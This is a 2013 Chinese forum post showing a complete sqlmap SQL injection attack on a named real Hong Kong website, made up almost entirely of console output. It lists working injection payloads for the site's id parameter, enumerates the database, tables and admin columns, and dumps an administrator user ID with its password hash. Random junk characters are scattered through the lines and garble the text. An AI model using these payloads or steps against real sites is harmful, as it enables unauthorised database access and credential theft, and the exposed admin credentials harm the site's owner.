找回密码
 立即注册
查看: 3226|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 z4 v* c$ H* @' q
ms "Mysql" --current-user       /*  注解:获取当前用户名称
- h3 z. V- A1 `. F3 U    sqlmap/0.9 - automatic SQL injection and database takeover tool7 }( J$ ]! M* L1 z+ \9 m
    http://sqlmap.sourceforge.net
  • starting at: 16:53:540 H4 e3 C: n, C, D' _
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 A0 j" \( G, d2 k0 |4 L& k
    session file! M1 g% f) G. t' B" T; X( G
    [16:53:54] [INFO] resuming injection data from session file
    2 x/ i3 J; ?9 w8 E  k, G[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 \3 q# R2 n" t4 L- E/ R
    [16:53:54] [INFO] testing connection to the target url$ U4 f# x9 v! d' B
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    . f( ]) D6 d; q% h4 n1 vsts:
    - _/ K7 h7 Y' @: o* ?6 T) r---
    / Q  i6 M0 v& }% @0 O! v; pPlace: GET# G6 }- c2 J# |
    Parameter: id
    2 E& C! F& v( n6 z    Type: boolean-based blind
    ; s" o2 ?( d' k  ?4 m2 ^/ t& [$ l    Title: AND boolean-based blind - WHERE or HAVING clause1 A, W- Y- \5 M; n
        Payload: id=276 AND 799=799
    * W# a) y& w% N, c4 Y    Type: error-based- g8 c1 Y. l. l9 A" w1 N9 Z
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ; p% ?' `( ^9 e) R    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 T4 Q( L0 s/ T% u" E
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,587 n' L% ?3 k4 d- M; W
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" Q* a& A$ w  N  _0 h3 ~8 ?. X
        Type: UNION query: k' b4 \9 A7 m1 h. {/ J
        Title: MySQL UNION query (NULL) - 1 to 10 columns
      J/ ~' p5 Y! ~$ D5 q0 [1 I3 s    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) c( p# u- O" h
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," l' p& g% K6 U# [. A
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    / _( |' z  L4 R    Type: AND/OR time-based blind5 J  M8 m0 z/ m' G9 F- t
        Title: MySQL > 5.0.11 AND time-based blind
    6 k1 W+ L& _& L. ?# {; b    Payload: id=276 AND SLEEP(5)
    * J- O8 T, H7 {0 `& C" d---9 F( A( D/ v! Y# D" @  x2 o, S
    [16:53:55] [INFO] the back-end DBMS is MySQL/ v1 A7 J! T! Z& q2 K
    web server operating system: Windows' z2 X& {  y' z
    web application technology: Apache 2.2.11, PHP 5.3.0
    ! p1 M" e( n( l2 j$ c$ D0 M3 P3 eback-end DBMS: MySQL 5.0+ s- r2 y  A- o- Y9 P: r& U
    [16:53:55] [INFO] fetching current user
    : ?8 T3 ]  Y# Scurrent user:    'root@localhost'   
    ! x! H4 o8 X2 }[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    % Z; W* g; R' qtput\www.wepost.com.hk'
  • shutting down at: 16:53:583 b# j( M* k: @# T0 u
    * A% f5 D: j" I; J
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    * x1 m; Q' U+ E* j( ]4 v; Lms "Mysql" --current-db                  /*当前数据库
    # K$ i3 C" q6 q; {    sqlmap/0.9 - automatic SQL injection and database takeover tool* n$ z% Y* }3 I& [5 g
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    8 y' u. S4 p/ J( Z[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as# Z- h+ P) I5 |- b/ g5 R* F
    session file
    4 ?6 `: |9 R, g* g[16:54:16] [INFO] resuming injection data from session file" f) x6 [' P8 V5 s' O  O" t
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file. _, Z7 U& X( Q' L! L
    [16:54:16] [INFO] testing connection to the target url
    1 S# a" C$ V: Q% Q0 v0 t4 t$ f% e# Lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    9 \; k6 E4 w, ^* qsts:# i! G- z1 V  p+ \( D" P4 [1 W
    ---
    ! U+ l0 I* V) M! l1 tPlace: GET
    4 z6 `1 k" t1 ~" g  sParameter: id4 E. D) U8 L+ w
        Type: boolean-based blind
    , N. x. C5 ?! [, |6 B6 G% Q    Title: AND boolean-based blind - WHERE or HAVING clause
    $ |, N8 H" k7 Q3 H2 t0 O: @    Payload: id=276 AND 799=799
    $ I8 P  X) A$ N    Type: error-based- `% L3 W- h$ u& N
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ! p7 Q" U( J" h. Q8 y    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,) p8 V2 Z/ q& e9 A6 [# q5 i
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    6 R' n+ ?. h+ L& {- ^* z5 @),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& I5 B: j: n' T4 h( l+ P8 p! S
        Type: UNION query
    $ I- S: J% `' R) f, ~    Title: MySQL UNION query (NULL) - 1 to 10 columns
    . L. W3 t- Y" q6 t* T    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    . d1 R3 t+ ~5 t. s, h* ^(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' q: l8 p- t8 K0 ?# J1 |" E
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    * r& X& |9 Q# d# F; e% j0 B    Type: AND/OR time-based blind
    ) M: a6 y# Y" G2 C" A& H5 [    Title: MySQL > 5.0.11 AND time-based blind# `6 T& ^! L- a4 @' i! @. _+ O' w/ L
        Payload: id=276 AND SLEEP(5)& G* R4 P0 W' K* y& O7 _
    ---
    & A8 f! J3 Y3 n: z7 s[16:54:17] [INFO] the back-end DBMS is MySQL
    0 W6 p$ s  V/ k7 G- w; j9 _web server operating system: Windows6 b# y+ S$ h6 o; K- {
    web application technology: Apache 2.2.11, PHP 5.3.0( R0 e- o; [- u- |
    back-end DBMS: MySQL 5.0( |' m+ L8 U, |7 B( Z$ @
    [16:54:17] [INFO] fetching current database
    & S# N4 Y; E) Qcurrent database:    'wepost', u% [% A" u# w  H7 X! p
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* p8 @9 H0 S7 q* q' Z  `, c4 N
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18( s2 u6 l/ J0 K
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ) T9 E2 |$ P, X$ w6 g7 m# [ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    7 A2 J; z4 |: e2 A7 x    sqlmap/0.9 - automatic SQL injection and database takeover tool
    6 d7 I# C' R# O0 M1 G4 T    http://sqlmap.sourceforge.net
  • starting at: 16:55:25- \% f5 Y" k0 ?& d$ G8 W/ [
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 n" z0 c) ?- X# {. A# b# ]0 h* V& x
    session file9 |% C$ F! ^( j6 x- K+ k1 n
    [16:55:25] [INFO] resuming injection data from session file
    ( Q- a# h% j, u( T5 K[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    5 j% c5 ]8 c1 }9 q[16:55:25] [INFO] testing connection to the target url6 @7 d/ [( N  K  c2 m" V
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    % O: Y9 Z2 R/ r4 d6 s: x% u6 Ests:# h0 w2 |3 ^2 p* K
    ---  J8 i5 [  g  N6 P
    Place: GET1 I+ Q  x% @, f* L
    Parameter: id
    / z) @# p1 y: ^6 z    Type: boolean-based blind% r& Q9 s- ?8 I% g
        Title: AND boolean-based blind - WHERE or HAVING clause# z# U+ ~7 f+ w# g
        Payload: id=276 AND 799=799
    7 O0 Y" C; \/ G    Type: error-based
      C3 t& k) {8 n+ B' h    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    % |/ J' c1 \% _    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    " _) Z9 `9 G3 T: i. b. d" v120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( Z( t" B1 I0 {9 U: s
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 w5 C9 g7 d$ M- k
        Type: UNION query. M* M" o% F7 _- A+ M- c6 O
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    + N! D' q! ]/ d, C8 E    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 z$ k' [/ c/ ?4 T" y) H9 k' ]
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    - y- ]) ^# I/ v" g3 D" d/ yCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 J0 R& j4 H1 v: q
        Type: AND/OR time-based blind
    ) V3 D- P, }+ f    Title: MySQL > 5.0.11 AND time-based blind
    ; P+ l/ ~# W5 z4 d    Payload: id=276 AND SLEEP(5)
    & q( \% M# G6 _7 K---5 `# l$ i9 h7 j0 P0 \- {( L( ~
    [16:55:26] [INFO] the back-end DBMS is MySQL  P( Y/ X" A6 R: v9 L7 C) k
    web server operating system: Windows
      v4 [" O$ P2 ?web application technology: Apache 2.2.11, PHP 5.3.07 ~( R- w5 Z' }  i6 l0 d
    back-end DBMS: MySQL 5.0
    - V& ~3 V7 V8 W% ][16:55:26] [INFO] fetching tables for database 'wepost'
    , e9 z6 P5 W4 \' a[16:55:27] [INFO] the SQL query used returns 6 entries
    " I& n# z+ P% _8 ~; R- hDatabase: wepost
    . v0 r6 u2 q- _  S+ M+ a: D) p1 a7 Q[6 tables]; ?. k4 f8 s2 T% H2 t3 t
    +-------------+
    5 w0 C9 J2 S  W| admin       |
    2 |  f) }. P4 D' |$ G| article     |3 {( L  T, U% y; g
    | contributor |3 q3 H4 t5 _- ?1 r; @3 ^
    | idea        |9 {$ F, F, ?. d- ~
    | image       |
    - W- d- G: E  F# \7 Q, B| issue       |
    - [, h; ?0 R. y# b2 n8 y8 J: @4 D+-------------+" Q* u. J" y6 F3 r) f# I9 z, k
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou/ }- Z5 ^+ M7 x" S
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:33
    - s/ T4 o' x4 I( ?! g0 T4 p$ d& I. K  _
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    - ~6 j. R% z  Q" m, Y! Q8 q4 t7 hms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名( h7 ]8 _& Z$ R0 y% p0 H, g/ M
        sqlmap/0.9 - automatic SQL injection and database takeover tool% v/ G: r5 Q9 M% i$ @# A' R
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06) o; j2 j7 z1 i: q: h# g
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    5 T6 i8 Y/ x6 S; l+ g+ {sts:; K& w% U( |9 e/ H- `6 t
    ---2 e/ \* H+ e  b+ r6 t# R0 X% Q
    Place: GET# P! l5 G$ p! w* h# G6 r# L
    Parameter: id
    ' s- O$ w" I* A( q$ [7 |# j! B2 a    Type: boolean-based blind
    1 N; p6 i/ @7 k2 a( t    Title: AND boolean-based blind - WHERE or HAVING clause) z9 O. ^# V; \5 A6 a
        Payload: id=276 AND 799=7996 y  f0 ?* q: Y( i. A
        Type: error-based6 M. j( Y7 i1 Z6 m; K6 [$ f
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause  \1 L! x8 J4 N  I; A
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    2 O* s% b) v& a# h120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    / S2 s% N: x; p3 v# f. }),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    9 R9 E9 k  h% o9 t  q    Type: UNION query. D7 ^& w# P: {% s8 Z
        Title: MySQL UNION query (NULL) - 1 to 10 columns% ^) f! O7 @; {! T$ v8 a
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) ]% R/ }1 Q4 t: w% T
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ; }- p& a. Z0 \" e) xCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#" E+ x! }. t% }) M" z: n% m# [
        Type: AND/OR time-based blind
    2 H5 M- D! |! s+ r, M  g    Title: MySQL > 5.0.11 AND time-based blind
    1 j# f# ]0 ^0 z. m' T  i2 {, a    Payload: id=276 AND SLEEP(5)
    ! _$ Y3 P( Q% n/ q5 ?---3 K7 v8 d/ X1 a; i0 @
    web server operating system: Windows* C1 T  O) g9 z7 h4 F5 v) g
    web application technology: Apache 2.2.11, PHP 5.3.0+ K. L' x& d  S* i% ?. \2 Z, X) a% e
    back-end DBMS: MySQL 5.0
    % U# J/ H+ A( _* e# a[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
      e+ h8 b% o3 c& Pssion': wepost, wepost( ]9 z1 t& ]  _5 j: u5 F
    Database: wepost2 Q* P6 G9 S- z: d+ G, K
    Table: admin
    0 B- L0 q" c$ A. V0 z+ |9 h[4 columns]
    * _# E2 s9 D  ]2 {& _% x( r5 D+----------+-------------+" N: A$ _7 b$ i2 ]/ a8 d( A
    | Column   | Type        |
    + C& p) D; l- P* }+----------+-------------+
    8 w) q: O8 l) k| id       | int(11)     |% M6 I3 m. m2 k5 f1 @) |
    | password | varchar(32) |5 ?; f4 q/ t8 b4 P' S, ?
    | type     | varchar(10) |% G/ k0 O# s7 f" e- F/ {& r
    | userid   | varchar(20) |
    $ S7 C4 u2 m& J- q5 |+----------+-------------+0 f& N! D# E7 h6 X2 I6 N9 |2 h
  • shutting down at: 16:56:19
    2 @0 H; X; l# C0 S7 F& H
    & |6 Y9 e( Y4 OD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db: W2 O) T1 H- j6 x
    ms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    ! p( x3 X+ h. O    sqlmap/0.9 - automatic SQL injection and database takeover tool$ X0 K+ @4 T' K& z& {
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
      q; |, }% ^5 w( Bsqlmap identified the following injection points with a total of 0 HTTP(s) reque0 J+ c$ y! J, S8 \3 o
    sts:
    7 H/ V! M8 z+ T, t8 z' v- z5 O---) n+ c+ s6 I# ^4 a% I' j5 q/ C
    Place: GET' Y) K' |' h# Q+ D/ t9 M' S
    Parameter: id
    1 h% c( Z" z6 M# Q' @    Type: boolean-based blind
    * f& W1 v% s+ N, M3 o    Title: AND boolean-based blind - WHERE or HAVING clause
    * Z" d& k, e$ M! W    Payload: id=276 AND 799=799
    8 e. r  F% y  x, d    Type: error-based
    ( f4 }% H& r" G    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 N1 u. H' H  G5 G9 C4 v
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 v  T" T# Q; x7 Q1 @5 [. B; S
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    ) O$ V7 W& d" p),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)' }9 j; `: w4 _. `9 c& u
        Type: UNION query4 n' J, C) g/ J& S4 y  _6 ?0 }
        Title: MySQL UNION query (NULL) - 1 to 10 columns0 ~% e# T4 d/ _0 f3 f4 K4 o" o
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    7 N  p/ w( |  l& Y6 ?) f" O(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),+ a/ n( u% b0 {* M
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## ]! j8 w/ j4 e$ Q+ P
        Type: AND/OR time-based blind8 p% C7 F: t1 A+ d; Q, u
        Title: MySQL > 5.0.11 AND time-based blind  _/ ~& X9 O# U0 p$ d, O9 U
        Payload: id=276 AND SLEEP(5)
    , D; j  }/ z1 b0 a3 x# }---+ i* _7 {/ |" y5 e8 k4 l
    web server operating system: Windows3 u; G* K' A' _6 X3 ]6 X  t
    web application technology: Apache 2.2.11, PHP 5.3.0
    0 q7 J/ {, x- _+ y) X) t/ h2 G+ _9 c! Yback-end DBMS: MySQL 5.0
    2 A. o! g% V2 Drecognized possible password hash values. do you want to use dictionary attack o1 h  E! v4 _/ _: c9 d
    n retrieved table items? [Y/n/q] y0 y. r6 m) H$ _4 h( Y9 m5 n
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    - t; v9 z% ~; P' T/ e, ydo you want to use common password suffixes? (slow!) [y/N] y5 W! E7 \8 f* ^! Y8 c
    Database: wepost
    9 s+ D# ^' s% }3 L8 D1 T( bTable: admin
    ; e5 i8 n+ _8 @[1 entry]- j, ?/ G# q1 n
    +----------------------------------+------------+; K* o8 N- q4 D! C
    | password                         | userid     |8 _3 X! K- ^, x! L3 e% z1 Q
    +----------------------------------+------------+
    ) @% |( @7 P: Y+ X1 h8 V| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |* M- w1 M5 r8 U5 l, g- b& d
    +----------------------------------+------------+
    3 m& u* @$ X- R
  • shutting down at: 16:58:14
    5 L+ U# v, p- [1 d+ ?
    ! v5 H* M# ?9 f# f2 xD:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表